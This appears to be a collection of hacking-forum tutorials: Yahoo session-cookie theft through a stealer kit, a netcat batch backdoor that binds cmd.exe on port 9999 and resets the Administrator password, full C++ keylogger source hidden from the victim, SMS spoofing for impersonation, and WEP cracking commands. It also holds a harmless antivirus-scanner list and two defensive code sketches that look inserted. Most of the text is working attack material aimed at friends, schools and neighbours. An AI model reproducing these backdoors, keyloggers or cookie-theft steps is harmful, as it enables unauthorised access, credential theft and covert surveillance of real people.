For hacking the session cookies we first need the session cookies of the victim and its quite simple to get the session cookies of the victim. You just need to send him one link as soon as he clicks on that we will get his session cookie.

After hacking the session cookies, we can use the stolen session cookie to log in to the victim's account without providing a username and password; as I already explained, session hacking removes the authentication on the server because we have the AUTO LOGIN cookie. In this type of attack, when the victim signs out, the hacker is signed out too. But in the case of Yahoo it is a little different: when the victim signs out, the attacker still has access to the account. Yahoo maintains the session for 24 hours and then destroys the session IDs on its server.

How to Steal the Session Cookies?
1. Go to the Website and register there:
Code:

http://www.my3gb.com/register.jsp

2. Download the Cookie stealer files:
[
Code:

url=http://www.mediafire.com/?q4oo0encvhtxoa1]Yahoo_Cookies_Hack_Isoftdl.com.zip[/url]

Now upload the four files on the website and create one empty directory naming cookies
4. Now Send the link of yahoo.php to victim. Now what will happen when user clicks on the yahoo.php is that its cookies are get stored into directory Cookies and simultaneously he is redirected to his account.

5. Now open the link Hacked.PHP to access the cookies. In my files the password is "password". You need to put that to access the files.
6. You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.
Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.
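The replay described in this post works only while the server still honours the copied session ID, and `document.cookie` can read the cookie only when it is not flagged HttpOnly. The following server-side sketch is an added example, not code from the original post or from Yahoo; the `SessionStore` class, the `sid` cookie name and the 8-hour absolute lifetime are assumptions, while the 20-minute idle limit is the figure quoted above.

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 20 * 60         # the 20-minute idle limit the post mentions
ABSOLUTE_LIFETIME = 8 * 3600   # assumed hard cap on any session (hypothetical value)


class SessionStore:
    """In-memory server-side session table (hypothetical, for illustration)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}  # sha256(token) -> session record

    @staticmethod
    def _key(token):
        # Store only a hash, so a leaked session table does not leak live tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, user):
        token = secrets.token_urlsafe(32)  # unguessable session ID
        now = self._clock()
        self._sessions[self._key(token)] = {"user": user, "created": now, "seen": now}
        return token

    def set_cookie_header(self, token):
        # HttpOnly hides the cookie from document.cookie, Secure keeps it off
        # plain HTTP, SameSite=Lax keeps it out of cross-site subrequests.
        return f"Set-Cookie: sid={token}; Path=/; HttpOnly; Secure; SameSite=Lax"

    def validate(self, token):
        key = self._key(token)
        record = self._sessions.get(key)
        if record is None:
            return None
        now = self._clock()
        expired = (now - record["seen"] > IDLE_TIMEOUT
                   or now - record["created"] > ABSOLUTE_LIFETIME)
        if expired:
            del self._sessions[key]
            return None
        record["seen"] = now
        return record["user"]

    def logout(self, token):
        # Sign-out destroys the server copy, so every copy of the cookie dies with it.
        self._sessions.pop(self._key(token), None)


def demo():
    now = [1_000_000.0]  # constructed clock so the timeout can be exercised offline
    store = SessionStore(clock=lambda: now[0])
    token = store.login("alice")
    copied = token  # stands in for the same cookie value loaded in a second browser
    results = {"header": store.set_cookie_header(token),
               "before_logout": store.validate(copied)}
    store.logout(token)
    results["after_logout"] = store.validate(copied)
    idle_token = store.login("alice")
    now[0] += IDLE_TIMEOUT + 1
    results["after_idle"] = store.validate(idle_token)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```
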

Hacking a Network Administrator Computer | Hackers Club

Hello dear friends. Today I teach you how to hack a network administrator's computer with an easy method. All my tricks are easy for everyone to understand.

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat
opens a port on a computer for access (If used correctly by a batch file you open a port on a
target computer). You will need to write a batch file. The batch file to copy netcat on the
remote computer will have to be run from the target computer (The person on the target will
have to execute the batch file in some way). Open Notepad and type this in:

Code:

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup

xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time
windows starts up, you can specify any port you wish. Open Notepad and type:

Code:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad, this will be the file that is copied into the
startup folder in the previous batch file we wrote. You can bind the batch file to another
file and share that file, let the target execute that file so that he can copy netcat and the
other batch file onto his/hers computer thus opening port 9999, after port 9999 has been
opened you can then use telnet and telnet to that port on the target computer to have full
access without ever needing any passwords of any sort. After you are in change the
Administrator password for if something happens to your files, the command is this:

Code:

net user Administrator newpassword

Code:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing
Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know
the Administrator password) Once you have Abel on the target you can start and stop services
and do more!

Enjoy !
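The persistence described in this post leaves a plain-text artifact: a batch file in the All Users Startup folder that starts netcat in listen mode and hands each connection to cmd.exe. The following detection sketch is an added example, not part of the original post; the function names and the sample file contents are constructed, and only the `-L -p 9999 -d -e cmd.exe` command line is taken from the post.

```python
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELL_NAMES = {"cmd", "cmd.exe", "powershell", "powershell.exe", "sh", "bash"}


def _basename(token):
    return token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_line(line):
    """Return a finding for a netcat listener that hands connections to a program."""
    stripped = line.strip()
    if not stripped or stripped.lower().startswith(("rem ", "::")):
        return None  # blank line or batch comment
    try:
        tokens = shlex.split(stripped, posix=False)  # keep backslashes literal
    except ValueError:  # unbalanced quote: fall back to whitespace splitting
        tokens = stripped.split()
    start = next((i for i, t in enumerate(tokens) if _basename(t) in NETCAT_NAMES), None)
    if start is None:
        return None
    listen, port, program = False, None, None
    i = start + 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and not tok.startswith("--"):
            for flag in tok[1:]:  # also handles bundled flags such as -lvp
                if flag in "lL":
                    listen = True
                elif flag in "pe" and i + 1 < len(tokens):
                    i += 1
                    value = tokens[i].strip('"')
                    if flag == "p":
                        port = value
                    else:
                        program = value
        i += 1
    if not (listen and program):
        return None  # a client connection or port check, not a bound listener
    return {"port": port, "program": program,
            "shell": _basename(program) in SHELL_NAMES, "line": stripped}


def scan_startup_files(files):
    """files maps a path to the script's text; returns one finding per flagged line."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            hit = analyze_line(line)
            if hit:
                findings.append({"path": path, "lineno": lineno, **hit})
    return findings


# Constructed sample input: one script as described in the post, one benign script.
SAMPLE_FILES = {
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Startup.bat":
        "@echo off\ncd\\\nnetcat.exe -L -p 9999 -d -e cmd.exe\n",
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\portcheck.bat":
        "@echo off\nrem nc.exe -l -p 1 -e cmd.exe\nnc.exe -z -w 3 fileserver 445\n",
}

if __name__ == "__main__":
    for finding in scan_startup_files(SAMPLE_FILES):
        print(finding)
```

A renamed binary defeats the name match, so in practice this check is paired with a review of listening ports and their owning processes.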

How to create a keylogger in C++

Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

SMS Spoofing | Works all over the world

Hi everyone,
i would like to share the sms spoofing service that i have been using lately with you all .
Earlier Sauhard123 had posted a TUT on how to spoof sms , but that only worked in india .
The sms spoofing service that i'd be sharing today works worldwide .
and above all You get free credits initially (Credit limit varies upon the country you'd use it in) .
So what is SMS spoofing ?
SMS spoofing is a relatively new technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. Spoofing has both legitimate uses (setting the company name from which the message is being sent, setting your own mobile number, or a product name) and illegitimate uses (such as impersonating another person, company, product).
This is not actually a trick or hack but a service offered by a company. But the only thing the company forgot is internal send ID Check i.e. which number we are using to send SMS. So this service allows us to send SMS from any number to any number that means. Now the number that we want to display would be displayed to the slave, though in actual the number that would have displayed by default would have been the number that you registered at the service with.
Hence we are exploiting the Internal sender ID phone verification feature.
Features
1. SMS spoofing itself ( send texts from any mobile number to any mobile number )
2. Messages are 100% anonymous, though using proxies is preferred while accessing the service
3. Spoofing Works Globally.
4. No Ads
5. No Spam
6. Texts get delivered Instantly.
Ok , so now talking about the service .
Well First Go To This Link ( Link removed ) ( Too Many Leechers)
PM me for the link
Signup .
While signing up provide a cell number that is accessible to you, as you'd receive your account's password at this number only.
Now when you have signed up, Go to "Send SMS to Number" Tab located in the left side of your browsing page.
In the "Send SMS To" Textbox type in the receiver's Number.
Now in the "Sender ID From" Textbox, type the number you want to display to your slave.
What Else you can do with SMS spoofing :
Update slave's Facebook status:
This had already been posted By Sauhard123
and it only works in India
just Send a sms to 9232232665 and type in slave's mobile no. in the "Sender ID From" textbox and type in the status in the "Message" Textbox.
This is One Loophole that i found by myself.
For Twitter ( works globally ), not limited to india
you can also update slave's status on twitter by spoofing His/Her Number.
Check out This LINK
to know more on how to update slave's Tweet.
One More Thing, Buying Credits is Real Cheap at this website. So don't hesitate to spend some money on buying credits.
I hope you Liked My TUT.
Feedback Appreciated.

List of Free Online Scanners 2011

What do the titles mean?
Browser - Scans are done inside your browser. A plugin is usually needed in order for a scan to take place. You will be prompted to install the plugin before the scan starts. NOTE: Internet Explorer is needed to run 95% of these links. It is recommended to use IE for them all!
Single File - These sites allow you to upload one (1) file you find suspicious. Most of these sites have a limit on the size of the file allowed to be uploaded. Be sure to check and make sure you meet their requirements.
Single File - Multi - This simply means that there are multiple scanning engines used to scan your file/URL.
File Analysis - Here you can submit a Windows executable and receive an analysis report telling you what it does.
URL Scan - These sites scan URL's and inform you whether or not they're safe to visit.
Browser:
http://www.eset.com/onlinescan/
http://www.pandasecurity.com/activescan/index/
http://www.bitdefender.com/scan8/ie.html
http://security.symantec.com/sscv6/home....XGEQGGYYFK
http://www.emsisoft.com/en/software/ax/?scan=1
http://us.mcafee.com/root/mfs/scan.asp?affid=56
http://support.f-secure.com/enu/home/ols.shtml
http://onecare.live.com/site/en-us/default.htm
http://www.tenebril.com/scanner/main_start.php
http://www.kingsoftresearch.com/kos_v3/index.htm
http://helpdeskarchive.uvic.ca/security/...check.html
Single File - Multi:
http://www.virustotal.com/
http://virusscan.jotti.org/
http://vscan.novirusthanks.org/
http://www.viruschief.com/
http://www.virscan.org/
Single File:
http://www.kaspersky.com/virusscanner
http://online.drweb.com/?url=1
http://onlinescan.avast.com/
http://www.gietl.com/test-clamav/
http://www.fortiguardcenter.com/antiviru...anner.html
http://www.threatexpert.com/filescan.aspx
http://www.filterbit.com/
URL Scan - Multi:
http://www.urlvoid.com/
http://www.ipvoid.com/
http://siteinspector.comodo.com/addsite_en/
Thanks, hope I could help. If you liked this article please leave a reply below and do suggest some online website vulnerability scanners too.

How to Crack a Wi-Fi Network’s WEP Password with BackTrack

WEP is one of the unsecured encryption schemes available, so hackers mostly try to break it in public environments and perhaps on a neighborhood's Wi-Fi signal. To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the task-bar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.

Now it's time to pick your network. Run:
airodump-ng (interface)
To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.
Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.

Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)
Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:

The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.
Problems Along the Way
With this article I set out to prove that cracking WEP is a relatively "easy" process for someone determined and willing to get the hardware and software going. I still think that's true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you'll notice that the last screenshot up there doesn't look like the others—it's because it's not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven't captured enough data for aircrack to decrypt the key.
So while this process is easy in theory, your mileage may vary depending on your hardware, proximity to the AP point, and the way the planets are aligned. Oh yeah, and if you're on deadline—Murphy's Law almost guarantees it won't work if you're on deadline.
Refer This Video if you don't understand the above tute :- WEP Cracking Video